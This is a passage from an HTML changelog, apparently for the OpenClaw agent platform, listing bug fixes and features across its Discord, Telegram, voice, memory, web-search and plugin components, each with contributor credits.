<p>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</p>
</li>
<li>
<p>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</p>
</li>
<li>
<p>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</p>
</li>
<li>
<p>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</p>
</li>
<li>
<p>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</p>
</li>
<li>
<p>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</p>
</li>
<li>
<p>Telegram/startup: use the existing <code>getMe</code> request guard for the gateway bot probe instead of a fixed 2.5-second budget, and honor higher <code>timeoutSeconds</code> configs for slow Telegram API paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a>.</p>
</li>
<li>
<p>Telegram/models: make model picker confirmations say selections are session-scoped and do not change the agent's persistent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</p>
</li>
<li>
<p>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</p>
</li>
<li>
<p>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</p>
</li>
<li>
<p>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</p>
</li>
<li>
<p>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</p>
</li>
<li>
<p>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</p>
</li>
<li>
<p>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</p>
</li>
<li>
<p>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</p>
</li>
<li>
<p>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</p>
</li>
<li>
<p>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</p>
</li>
<li>
<p>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</p>
</li>
<li>
<p>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</p>
</li>
<li>
<p>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</p>
</li>
<li>
<p>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</p>
</li>
<li>
<p>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</p>
</li>
<li>
<p>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</p>
</li>
<li>
<p>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</p>
</li>
<li>
<p>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</p>
</li>
<li>
<p>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</p>
</li>
<li>
<p>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</p>
</li>
<li>
<p>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</p>
</li>
<li>
<p>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</p>
</li>
<li>
